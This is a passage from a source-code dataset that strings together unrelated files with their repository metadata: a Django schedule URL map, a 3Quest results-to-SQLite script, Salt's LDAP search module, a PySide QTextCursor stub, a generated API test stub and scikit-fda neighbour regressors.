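#       "recommended_monitor_metadata": {"description": "Alert on Foo error rate."}
#   }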
| 41.312977
| 120
| 0.571877
|
3679a441970e3fdd0647330f8378b3cbce1d21f1
| 1,824
|
py
|
Python
|
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | null | null | null |
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | 5
|
2015-07-16T19:46:00.000Z
|
2018-03-11T05:58:48.000Z
|
symposion/schedule/urls.py
|
pyohio/symposion
|
f8ec9c7e7daab4658061867d1294c1c126dd2919
|
[
"BSD-3-Clause"
] | 1
|
2017-01-27T21:18:26.000Z
|
2017-01-27T21:18:26.000Z
|
from __future__ import unicode_literals
from django.conf.urls import url
from .views import (
schedule_conference,
schedule_edit,
schedule_list,
schedule_list_csv,
schedule_list_json,
schedule_presentation_detail,
schedule_detail,
schedule_slot_edit,
schedule_json,
session_staff_email,
session_list,
session_detail,
speaker_list_json,
organizer_list_json,
slots_list_json,
)
urlpatterns = [
url(r"^$", schedule_conference, name="schedule_conference"),
url(r"^edit/$", schedule_edit, name="schedule_edit"),
url(r"^list/$", schedule_list, name="schedule_list"),
url(r"^presentations.csv$", schedule_list_csv, name="schedule_list_csv"),
url(r"^presentation/(\d+)/$", schedule_presentation_detail, name="schedule_presentation_detail"),
url(r"^organizers/list/json/$", organizer_list_json, name="organizer_list_json"),
url(r"^speakers/list/json/$", speaker_list_json, name="speaker_list_json"),
url(r"^slots/list/json/$", slots_list_json, name="slots_list_json"),
url(r"^([\w\-]+)/$", schedule_detail, name="schedule_detail"),
url(r"^([\w\-]+)/edit/$", schedule_edit, name="schedule_edit"),
url(r"^([\w\-]+)/list/$", schedule_list, name="schedule_list"),
url(r"^([\w\-]+)/list/json/$", schedule_list_json, name="schedule_list_json"),
url(r"^([\w\-]+)/presentations.csv$", schedule_list_csv, name="schedule_list_csv"),
url(r"^([\w\-]+)/edit/slot/(\d+)/", schedule_slot_edit, name="schedule_slot_edit"),
url(r"^conference.json", schedule_json, name="schedule_json"),
url(r"^sessions/staff.txt$", session_staff_email, name="schedule_session_staff_email"),
url(r"^sessions/$", session_list, name="schedule_session_list"),
url(r"^session/(\d+)/$", session_detail, name="schedule_session_detail"),
]
| 43.428571
| 101
| 0.697917
|
9b57b05732f73fa5f2d1b20dc1099d44b4a8f2c7
| 6,397
|
py
|
Python
|
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | null | null | null |
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | 11
|
2021-02-08T20:45:23.000Z
|
2022-03-12T01:00:11.000Z
|
3QVeryMuch/test/test_stort3Qdb.py
|
philip-shen/note_python
|
db0ad84af25464a22ac52e348960107c81e74a56
|
[
"MIT"
] | null | null | null |
# 3/28/2020 Convert Nested JSON to Pandas DataFrame and Flatten List in a Column
# https://gist.github.com/rafaan/4ddc91ae47ea46a46c0b
# 6/25/2020 Initial
########################################################
import json
from pandas.io.json import json_normalize
import pandas as pd
import os,sys,time,platform
strabspath=os.path.abspath(__file__)
strdirname=os.path.dirname(strabspath)
str_split=os.path.split(strdirname)
prevdirname=str_split[0]
dirnamelib=os.path.join(prevdirname,"lib")
dirnamelog=os.path.join(prevdirname,"logs")
sys.path.append(dirnamelib)
from logger import logger
from libCSV import *
import csvdataAnalysis as csvdata_analysis
import db_sqlite as db_sqlite
if __name__ == "__main__":
# Get present time
t0 = time.time()
local_time = time.localtime(t0)
msg = 'Start Time is {}/{}/{} {}:{}:{}'
logger.info(msg.format( local_time.tm_year,local_time.tm_mon,local_time.tm_mday,\
local_time.tm_hour,local_time.tm_min,local_time.tm_sec))
args = sys.argv
with open('config.json') as f:
data = json.load(f)
try:
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
opt_verbose='ON'
#opt_verbose='OFF'
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
except IOError:
print('IOError: Couldn\'t open "%s"' % args[1])
msg = 'Time duration: {:.2f} seconds.'
logger.info(msg.format( time.time() - t0))
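# Illustrative sketch, not part of the original script: the config.json layout this
# script expects, inferred from the keys read above (the paths are hypothetical).
#
#   {
#       "3Quest": [
#           {"path_dut": "..\\logs\\boommic_SWout\\dut"},
#           {"path_dut": "..\\logs\\Intermic_SWin\\dut"}
#       ]
#   }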
| 47.385185
| 176
| 0.530405
|
8b1e22d994ed025617c24c82bd0c0bc97fa27c98
| 6,046
|
py
|
Python
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 9,425
|
2015-01-01T05:59:24.000Z
|
2022-03-31T20:44:05.000Z
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 33,507
|
2015-01-01T00:19:56.000Z
|
2022-03-31T23:48:20.000Z
|
salt/modules/ldapmod.py
|
ifraixedes/saltstack-salt
|
b54becb8b43cc9b7c00b2c0bc637ac534dc62896
|
[
"Apache-2.0"
] | 5,810
|
2015-01-01T19:11:45.000Z
|
2022-03-31T02:37:20.000Z
|
"""
Salt interface to LDAP commands
:depends: - ldap Python module
:configuration: In order to connect to LDAP, certain configuration is required
in the minion config on the LDAP server. The minimum configuration items
that must be set are:
.. code-block:: yaml
ldap.basedn: dc=acme,dc=com (example values, adjust to suit)
If your LDAP server requires authentication then you must also set:
.. code-block:: yaml
ldap.anonymous: False
ldap.binddn: admin
ldap.bindpw: password
In addition, the following optional values may be set:
.. code-block:: yaml
ldap.server: localhost (default=localhost, see warning below)
ldap.port: 389 (default=389, standard port)
ldap.tls: False (default=False, no TLS)
ldap.no_verify: False (default=False, verify TLS)
ldap.anonymous: True (default=True, bind anonymous)
ldap.scope: 2 (default=2, ldap.SCOPE_SUBTREE)
ldap.attrs: [saltAttr] (default=None, return all attributes)
.. warning::
At the moment this module only recommends connection to LDAP services
listening on ``localhost``. This is deliberate to avoid the potentially
dangerous situation of multiple minions sending identical update commands
to the same LDAP server. It's easy enough to override this behavior, but
badness may ensue - you have been warned.
"""
import logging
import time
import salt.utils.data
from salt.exceptions import CommandExecutionError
try:
import ldap
import ldap.modlist # pylint: disable=no-name-in-module
HAS_LDAP = True
except ImportError:
HAS_LDAP = False
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "ldap"
def __virtual__():
"""
Only load this module if the ldap config is set
"""
# These config items must be set in the minion config
if HAS_LDAP:
return __virtualname__
return (
False,
"The ldapmod execution module cannot be loaded: ldap config not present.",
)
def _config(name, key=None, **kwargs):
"""
Return a value for 'name' from command line args then config file options.
Specify 'key' if the config file option is not the same as 'name'.
"""
if key is None:
key = name
if name in kwargs:
value = kwargs[name]
else:
value = __salt__["config.option"]("ldap.{}".format(key))
return salt.utils.data.decode(value, to_str=True)
def _connect(**kwargs):
"""
Instantiate LDAP Connection class and return an LDAP connection object
"""
connargs = {}
for name in [
"uri",
"server",
"port",
"tls",
"no_verify",
"binddn",
"bindpw",
"anonymous",
]:
connargs[name] = _config(name, **kwargs)
return _LDAPConnection(**connargs).ldap
def search(
filter, # pylint: disable=C0103
dn=None, # pylint: disable=C0103
scope=None,
attrs=None,
**kwargs
):
"""
Run an arbitrary LDAP query and return the results.
CLI Example:
.. code-block:: bash
salt 'ldaphost' ldap.search "filter=cn=myhost"
Return data:
.. code-block:: python
{'myhost': {'count': 1,
'results': [['cn=myhost,ou=hosts,o=acme,c=gb',
{'saltKeyValue': ['ntpserver=ntp.acme.local',
'foo=myfoo'],
'saltState': ['foo', 'bar']}]],
'time': {'human': '1.2ms', 'raw': '0.00123'}}}
Search and connection options can be overridden by specifying the relevant
option as key=value pairs, for example:
.. code-block:: bash
salt 'ldaphost' ldap.search filter=cn=myhost dn=ou=hosts,o=acme,c=gb
scope=1 attrs='' server='localhost' port='7393' tls=True bindpw='ssh'
"""
if not dn:
dn = _config("dn", "basedn") # pylint: disable=C0103
if not scope:
scope = _config("scope")
if attrs == "": # Allow command line 'return all' attr override
attrs = None
elif attrs is None:
attrs = _config("attrs")
_ldap = _connect(**kwargs)
start = time.time()
log.debug(
"Running LDAP search with filter:%s, dn:%s, scope:%s, attrs:%s",
filter,
dn,
scope,
attrs,
)
results = _ldap.search_s(dn, int(scope), filter, attrs)
elapsed = time.time() - start
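# Report sub-200 ms searches in milliseconds, otherwise in seconds.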
if elapsed < 0.200:
elapsed_h = str(round(elapsed * 1000, 1)) + "ms"
else:
elapsed_h = str(round(elapsed, 2)) + "s"
ret = {
"results": results,
"count": len(results),
"time": {"human": elapsed_h, "raw": str(round(elapsed, 5))},
}
return ret
class _LDAPConnection:
"""
Setup an LDAP connection.
"""
def __init__(self, uri, server, port, tls, no_verify, binddn, bindpw, anonymous):
"""
Bind to an LDAP directory using passed credentials.
"""
self.uri = uri
self.server = server
self.port = port
self.tls = tls
self.binddn = binddn
self.bindpw = bindpw
if self.uri == "":
self.uri = "ldap://{}:{}".format(self.server, self.port)
try:
if no_verify:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
self.ldap = ldap.initialize("{}".format(self.uri))
self.ldap.protocol_version = 3 # ldap.VERSION3
self.ldap.set_option(ldap.OPT_REFERRALS, 0) # Needed for AD
if self.tls:
self.ldap.start_tls_s()
if not anonymous:
self.ldap.simple_bind_s(self.binddn, self.bindpw)
except Exception as ldap_error: # pylint: disable=broad-except
raise CommandExecutionError(
"Failed to bind to LDAP server {} as {}: {}".format(
self.uri, self.binddn, ldap_error
)
)
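# --- Editor's illustrative sketch (not Salt's API) ---
# _config() above resolves each connection option by checking explicit keyword
# arguments first and falling back to the ``ldap.*`` entries in the minion
# config, which is what allows the CLI overrides shown in the search()
# docstring (e.g. port='7393'). A standalone toy version of that lookup order:
def _lookup_option(name, minion_config, **kwargs):
    """Return kwargs[name] if given, otherwise the 'ldap.<name>' config value."""
    if name in kwargs:
        return kwargs[name]
    return minion_config.get("ldap.{}".format(name))

assert _lookup_option("port", {"ldap.port": 389}) == 389
assert _lookup_option("port", {"ldap.port": 389}, port="7393") == "7393"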
| 28.12093
| 85
| 0.592954
|
3ae7c4a22cffa35f7b1e2ff28be360b161d229ea
| 8,645
|
py
|
Python
|
resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | 1
|
2020-04-20T02:27:20.000Z
|
2020-04-20T02:27:20.000Z
|
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module PySide.QtGui
# from C:\Python27\lib\site-packages\PySide\QtGui.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QTextCursor(__Shiboken.Object):
# no doc
def anchor(self, *args, **kwargs): # real signature unknown
pass
def atBlockEnd(self, *args, **kwargs): # real signature unknown
pass
def atBlockStart(self, *args, **kwargs): # real signature unknown
pass
def atEnd(self, *args, **kwargs): # real signature unknown
pass
def atStart(self, *args, **kwargs): # real signature unknown
pass
def beginEditBlock(self, *args, **kwargs): # real signature unknown
pass
def block(self, *args, **kwargs): # real signature unknown
pass
def blockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def blockFormat(self, *args, **kwargs): # real signature unknown
pass
def blockNumber(self, *args, **kwargs): # real signature unknown
pass
def charFormat(self, *args, **kwargs): # real signature unknown
pass
def clearSelection(self, *args, **kwargs): # real signature unknown
pass
def columnNumber(self, *args, **kwargs): # real signature unknown
pass
def createList(self, *args, **kwargs): # real signature unknown
pass
def currentFrame(self, *args, **kwargs): # real signature unknown
pass
def currentList(self, *args, **kwargs): # real signature unknown
pass
def currentTable(self, *args, **kwargs): # real signature unknown
pass
def deleteChar(self, *args, **kwargs): # real signature unknown
pass
def deletePreviousChar(self, *args, **kwargs): # real signature unknown
pass
def document(self, *args, **kwargs): # real signature unknown
pass
def endEditBlock(self, *args, **kwargs): # real signature unknown
pass
def hasComplexSelection(self, *args, **kwargs): # real signature unknown
pass
def hasSelection(self, *args, **kwargs): # real signature unknown
pass
def insertBlock(self, *args, **kwargs): # real signature unknown
pass
def insertFragment(self, *args, **kwargs): # real signature unknown
pass
def insertFrame(self, *args, **kwargs): # real signature unknown
pass
def insertHtml(self, *args, **kwargs): # real signature unknown
pass
def insertImage(self, *args, **kwargs): # real signature unknown
pass
def insertList(self, *args, **kwargs): # real signature unknown
pass
def insertTable(self, *args, **kwargs): # real signature unknown
pass
def insertText(self, *args, **kwargs): # real signature unknown
pass
def isCopyOf(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def joinPreviousEditBlock(self, *args, **kwargs): # real signature unknown
pass
def keepPositionOnInsert(self, *args, **kwargs): # real signature unknown
pass
def mergeBlockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def mergeBlockFormat(self, *args, **kwargs): # real signature unknown
pass
def mergeCharFormat(self, *args, **kwargs): # real signature unknown
pass
def movePosition(self, *args, **kwargs): # real signature unknown
pass
def position(self, *args, **kwargs): # real signature unknown
pass
def positionInBlock(self, *args, **kwargs): # real signature unknown
pass
def removeSelectedText(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectedTableCells(self, *args, **kwargs): # real signature unknown
pass
def selectedText(self, *args, **kwargs): # real signature unknown
pass
def selection(self, *args, **kwargs): # real signature unknown
pass
def selectionEnd(self, *args, **kwargs): # real signature unknown
pass
def selectionStart(self, *args, **kwargs): # real signature unknown
pass
def setBlockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def setBlockFormat(self, *args, **kwargs): # real signature unknown
pass
def setCharFormat(self, *args, **kwargs): # real signature unknown
pass
def setKeepPositionOnInsert(self, *args, **kwargs): # real signature unknown
pass
def setPosition(self, *args, **kwargs): # real signature unknown
pass
def setVerticalMovementX(self, *args, **kwargs): # real signature unknown
pass
def setVisualNavigation(self, *args, **kwargs): # real signature unknown
pass
def verticalMovementX(self, *args, **kwargs): # real signature unknown
pass
def visualNavigation(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __eq__(self, y): # real signature unknown; restored from __doc__
""" x.__eq__(y) <==> x==y """
pass
def __ge__(self, y): # real signature unknown; restored from __doc__
""" x.__ge__(y) <==> x>=y """
pass
def __gt__(self, y): # real signature unknown; restored from __doc__
""" x.__gt__(y) <==> x>y """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, y): # real signature unknown; restored from __doc__
""" x.__le__(y) <==> x<=y """
pass
def __lt__(self, y): # real signature unknown; restored from __doc__
""" x.__lt__(y) <==> x<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __ne__(self, y): # real signature unknown; restored from __doc__
""" x.__ne__(y) <==> x!=y """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
BlockUnderCursor = PySide.QtGui.QTextCursor.SelectionType.BlockUnderCursor
Document = PySide.QtGui.QTextCursor.SelectionType.Document
Down = PySide.QtGui.QTextCursor.MoveOperation.Down
End = PySide.QtGui.QTextCursor.MoveOperation.End
EndOfBlock = PySide.QtGui.QTextCursor.MoveOperation.EndOfBlock
EndOfLine = PySide.QtGui.QTextCursor.MoveOperation.EndOfLine
EndOfWord = PySide.QtGui.QTextCursor.MoveOperation.EndOfWord
KeepAnchor = PySide.QtGui.QTextCursor.MoveMode.KeepAnchor
Left = PySide.QtGui.QTextCursor.MoveOperation.Left
LineUnderCursor = PySide.QtGui.QTextCursor.SelectionType.LineUnderCursor
MoveAnchor = PySide.QtGui.QTextCursor.MoveMode.MoveAnchor
MoveMode = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.MoveMode'>"
MoveOperation = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.MoveOperation'>"
NextBlock = PySide.QtGui.QTextCursor.MoveOperation.NextBlock
NextCell = PySide.QtGui.QTextCursor.MoveOperation.NextCell
NextCharacter = PySide.QtGui.QTextCursor.MoveOperation.NextCharacter
NextRow = PySide.QtGui.QTextCursor.MoveOperation.NextRow
NextWord = PySide.QtGui.QTextCursor.MoveOperation.NextWord
NoMove = PySide.QtGui.QTextCursor.MoveOperation.NoMove
PreviousBlock = PySide.QtGui.QTextCursor.MoveOperation.PreviousBlock
PreviousCell = PySide.QtGui.QTextCursor.MoveOperation.PreviousCell
PreviousCharacter = PySide.QtGui.QTextCursor.MoveOperation.PreviousCharacter
PreviousRow = PySide.QtGui.QTextCursor.MoveOperation.PreviousRow
PreviousWord = PySide.QtGui.QTextCursor.MoveOperation.PreviousWord
Right = PySide.QtGui.QTextCursor.MoveOperation.Right
SelectionType = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.SelectionType'>"
Start = PySide.QtGui.QTextCursor.MoveOperation.Start
StartOfBlock = PySide.QtGui.QTextCursor.MoveOperation.StartOfBlock
StartOfLine = PySide.QtGui.QTextCursor.MoveOperation.StartOfLine
StartOfWord = PySide.QtGui.QTextCursor.MoveOperation.StartOfWord
Up = PySide.QtGui.QTextCursor.MoveOperation.Up
WordLeft = PySide.QtGui.QTextCursor.MoveOperation.WordLeft
WordRight = PySide.QtGui.QTextCursor.MoveOperation.WordRight
WordUnderCursor = PySide.QtGui.QTextCursor.SelectionType.WordUnderCursor
| 33.25
| 94
| 0.672065
|
bcc1dd1bfcd3e8bb635db2d4093d3c6811342d4b
| 813
|
py
|
Python
|
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | 1
|
2017-05-03T12:48:22.000Z
|
2017-05-03T12:48:22.000Z
|
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.product_price_response import ProductPriceResponse
class TestProductPriceResponse(unittest.TestCase):
""" ProductPriceResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testProductPriceResponse(self):
"""
Test ProductPriceResponse
"""
model = kinow_client.models.product_price_response.ProductPriceResponse()
if __name__ == '__main__':
unittest.main()
| 18.906977
| 81
| 0.708487
|
7da0e431677783c3e72205012b743d8b82287911
| 13,599
|
py
|
Python
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 147
|
2019-05-10T20:46:42.000Z
|
2022-03-25T17:23:19.000Z
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 306
|
2019-04-26T08:56:05.000Z
|
2022-03-30T11:12:48.000Z
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 38
|
2019-09-03T17:24:04.000Z
|
2022-01-06T05:09:18.000Z
|
"""Neighbor models for regression."""
from sklearn.neighbors import (
KNeighborsRegressor as _KNeighborsRegressor,
RadiusNeighborsRegressor as _RadiusNeighborsRegressor,
)
from .._neighbors_base import (
KNeighborsMixin,
NeighborsBase,
NeighborsRegressorMixin,
RadiusNeighborsMixin,
)
class KNeighborsRegressor(NeighborsBase, NeighborsRegressorMixin,
KNeighborsMixin):
"""Regression based on k-nearest neighbors.
Regression with scalar, multivariate or functional response.
The target is predicted by local interpolation of the targets associated
with the nearest neighbors in the training set.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable, optional (default = 'uniform')
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
regressor : callable, optional ((default =
:func:`mean <skfda.exploratory.stats.mean>`))
Function to perform the local regression in the functional response
case. By default the mean is used. The callable receives the neighbors of
a test sample and, if weights != 'uniform', an array of weights as a
second parameter.
algorithm : {'auto', 'ball_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`sklearn.neighbors.BallTree`.
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm based on
the values passed to :meth:`fit` method.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
metric : string or callable, (default
:func:`l2_distance <skfda.misc.metrics.l2_distance>`)
the distance metric to use for the tree. The default metric is
the L2 distance. See the documentation of the metrics module
for a list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int or None, optional (default=None)
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors.
Doesn't affect :meth:`fit` method.
multivariate_metric : boolean, optional (default = False)
Indicates if the metric used is a sklearn distance between vectors (see
:class:`sklearn.neighbors.DistanceMetric`) or a functional metric of
the module :mod:`skfda.misc.metrics`.
Examples
--------
Firstly, we will create a toy dataset with gaussian-like samples shifted.
>>> from skfda.ml.regression import KNeighborsRegressor
>>> from skfda.datasets import make_multimodal_samples
>>> from skfda.datasets import make_multimodal_landmarks
>>> y = make_multimodal_landmarks(n_samples=30, std=.5, random_state=0)
>>> y_train = y.flatten()
>>> X_train = make_multimodal_samples(n_samples=30, std=.5, random_state=0)
>>> X_test = make_multimodal_samples(n_samples=5, std=.05, random_state=0)
We will fit a K-Nearest Neighbors regressor to regress a scalar response.
>>> neigh = KNeighborsRegressor()
>>> neigh.fit(X_train, y_train)
KNeighborsRegressor(...)
We can predict the modes of new samples
>>> neigh.predict(X_test).round(2) # Predict test data
array([ 0.38, 0.14, 0.27, 0.52, 0.38])
Now we will create a functional response to train the model
>>> y_train = 5 * X_train + 1
>>> y_train
FDataGrid(...)
We train the estimator with the functional response
>>> neigh.fit(X_train, y_train)
KNeighborsRegressor(...)
And predict the responses as in the first case.
>>> neigh.predict(X_test)
FDataGrid(...)
See also
--------
:class:`~skfda.ml.classification.KNeighborsClassifier`
:class:`~skfda.ml.classification.RadiusNeighborsClassifier`
:class:`~skfda.ml.classification.NearestCentroids`
:class:`~skfda.ml.regression.RadiusNeighborsRegressor`
:class:`~skfda.ml.clustering.NearestNeighbors`
Notes
-----
See Nearest Neighbors in the sklearn online documentation for a discussion
of the choice of ``algorithm`` and ``leaf_size``.
This class wraps the sklearn regressor
`sklearn.neighbors.KNeighborsRegressor`.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform', regressor='mean',
algorithm='auto', leaf_size=30, metric='l2',
metric_params=None, n_jobs=1, multivariate_metric=False):
"""Initialize the regressor."""
super().__init__(n_neighbors=n_neighbors,
weights=weights, algorithm=algorithm,
leaf_size=leaf_size, metric=metric,
metric_params=metric_params, n_jobs=n_jobs,
multivariate_metric=multivariate_metric)
self.regressor = regressor
def _init_multivariate_estimator(self, sklearn_metric):
"""Initialize the sklearn K neighbors estimator.
Args:
sklearn_metric: (pyfunc or 'precomputed'): Metric compatible with
sklearn API or matrix (n_samples, n_samples) with precomputed
distances.
Returns:
Sklearn K Neighbors estimator initialized.
"""
return _KNeighborsRegressor(
n_neighbors=self.n_neighbors, weights=self.weights,
algorithm=self.algorithm, leaf_size=self.leaf_size,
metric=sklearn_metric, metric_params=self.metric_params,
n_jobs=self.n_jobs)
def _query(self, X):
"""Return distances and neighbors of given sample."""
return self.estimator_.kneighbors(X)
class RadiusNeighborsRegressor(NeighborsBase, NeighborsRegressorMixin,
RadiusNeighborsMixin):
"""Regression based on neighbors within a fixed radius.
Regression with scalar, multivariate or functional response.
The target is predicted by local interpolation of the targets associated
with the nearest neighbors in the training set.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
regressor : callable, optional ((default =
:func:`mean <skfda.exploratory.stats.mean>`))
Function to perform the local regression in the functional response
case. By default the mean is used. The callable receives the neighbors of
a test sample and, if weights != 'uniform', an array of weights as a
second parameter.
algorithm : {'auto', 'ball_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`sklearn.neighbors.BallTree`.
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
